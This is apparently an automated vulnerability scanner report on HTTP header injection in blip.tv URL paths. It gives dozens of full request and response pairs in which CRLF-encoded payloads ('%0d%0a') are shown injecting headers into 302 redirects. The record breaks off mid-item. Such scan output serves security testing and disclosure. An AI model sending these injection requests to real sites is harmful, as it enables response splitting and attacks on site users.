HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/355ea 83299189f58 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:31 GMT X-Varnish: 1324527973 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/355ea 83299189f58">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 3418e%0d%0ae1c7f4e2e20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3418e%0d%0ae1c7f4e2e20/4650005 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/3418e e1c7f4e2e20/4650005 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:33 GMT X-Varnish: 2146046304 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/3418e e1c7f4e2e20/4650005"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 44404%0d%0a50fe40dacb2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/44404%0d%0a50fe40dacb2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/44404 50fe40dacb2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:33 GMT X-Varnish: 2146046349 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/44404 50fe40dacb2">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload ac072%0d%0a258f254ae06 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ac072%0d%0a258f254ae06/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/ac072 258f254ae06/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 338 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1324527517 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/ac072 258f254ae06/get/Ama20 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 31917%0d%0aa0db1a8f74f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/31917%0d%0aa0db1a8f74f/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/31917 a0db1a8f74f/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 339 Date: Thu, 20 Jan 2011 00:38:29 GMT X-Varnish: 1025267014 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/31917 a0db1a8f74f/Ama2 ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload c462e%0d%0af639ff48709 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/c462e%0d%0af639ff48709 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/c462e f639ff48709 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:29 GMT X-Varnish: 1274881938 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/c462e f639ff48709" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 108bb%0d%0a5a88d344650 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /108bb%0d%0a5a88d344650/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/108bb 5a88d344650/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 338 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 344227222 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/108bb 5a88d344650/get/Ama20 ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4aab6%0d%0a56621af0bdb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/4aab6%0d%0a56621af0bdb/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/4aab6 56621af0bdb/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 339 Date: Thu, 20 Jan 2011 00:38:29 GMT X-Varnish: 1248905461 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/4aab6 56621af0bdb/Ama2 ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 74bb7%0d%0a5b28c074473 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/74bb7%0d%0a5b28c074473 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/74bb7 5b28c074473 Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:29 GMT X-Varnish: 2146045865 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/74bb7 5b28c074473" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload d0a48%0d%0a04d7f7c54c3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d0a48%0d%0a04d7f7c54c3/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/d0a48 04d7f7c54c3/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 326 Date: Thu, 20 Jan 2011 00:38:17 GMT X-Varnish: 1025265403 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/d0a48 04d7f7c54c3/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 26ddf%0d%0aec507006938 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/26ddf%0d%0aec507006938/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/26ddf ec507006938/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 41209%0d%0ac3c45ea772d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/41209%0d%0ac3c45ea772d HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/41209 c3c45ea772d Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:18 GMT X-Varnish: 1498215508 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/41209 c3c45ea772d" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload be36f%0d%0a55b217f8a8e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /be36f%0d%0a55b217f8a8e/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/be36f 55b217f8a8e/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b2f74%0d%0af13dc8c7cfe was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/b2f74%0d%0af13dc8c7cfe/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/b2f74 f13dc8c7cfe/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 608af%0d%0ab546ec733c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/608af%0d%0ab546ec733c HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/608af b546ec733c Content-Type: text/html; charset=iso-8859-1 Content-Length: 301 Date: Thu, 20 Jan 2011 00:38:17 GMT X-Varnish: 1324526006 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/608af b546ec733c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 46a60%0d%0a03b1ec9fb4e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /46a60%0d%0a03b1ec9fb4e/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/46a60 03b1ec9fb4e/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 353 Date: Thu, 20 Jan 2011 00:38:23 GMT X-Varnish: 1025266264 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/46a60 03b1ec9fb4e/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload ffbc0%0d%0a3d60c17a022 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/ffbc0%0d%0a3d60c17a022/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/ffbc0 3d60c17a022/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 354 Date: Thu, 20 Jan 2011 00:38:24 GMT X-Varnish: 344226511 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/ffbc0 3d60c17a022/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 51e7d%0d%0a4338ec52283 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/51e7d%0d%0a4338ec52283 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/51e7d 4338ec52283 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:24 GMT X-Varnish: 1274881279 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/51e7d 4338ec52283" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e0840%0d%0a13daeda52ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e0840%0d%0a13daeda52ad/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e0840 13daeda52ad/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 338 Date: Thu, 20 Jan 2011 00:38:22 GMT X-Varnish: 1324526714 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e0840 13daeda52ad/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 7ed3d%0d%0a7f56045eacf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/7ed3d%0d%0a7f56045eacf/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/7ed3d 7f56045eacf/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 339 Date: Thu, 20 Jan 2011 00:38:22 GMT X-Varnish: 1025266163 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/7ed3d 7f56045eacf/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload f728c%0d%0aa0fb5fbeeea was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/f728c%0d%0aa0fb5fbeeea HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/f728c a0fb5fbeeea Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:23 GMT X-Varnish: 1025266212 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/f728c a0fb5fbeeea" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload cbc6f%0d%0a2a8b44a020e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /cbc6f%0d%0a2a8b44a020e/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/cbc6f 2a8b44a020e/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 366 Date: Thu, 20 Jan 2011 00:38:18 GMT X-Varnish: 1025265566 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/cbc6f 2a8b44a020e/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 721e9%0d%0ab21d787f4c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/721e9%0d%0ab21d787f4c/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/721e9 b21d787f4c/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 351 Date: Thu, 20 Jan 2011 00:38:18 GMT X-Varnish: 1324526184 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/721e9 b21d787f4c/Armch ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 3622e%0d%0aa0bd8450bdc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/3622e%0d%0aa0bd8450bdc HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/3622e a0bd8450bdc Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:19 GMT X-Varnish: 1025265669 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/3622e a0bd8450bdc" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 74609%0d%0a1322f15c35b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /74609%0d%0a1322f15c35b/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/74609 1322f15c35b/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 351 Date: Thu, 20 Jan 2011 00:38:20 GMT X-Varnish: 1274880713 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/74609 1322f15c35b/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d4d68%0d%0a1394314c0ea was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
